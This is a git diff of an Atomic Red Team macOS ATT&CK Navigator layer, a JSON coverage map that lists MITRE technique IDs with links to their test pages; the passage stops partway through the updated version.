diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 09dc27c0..0a95a5d3 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"technique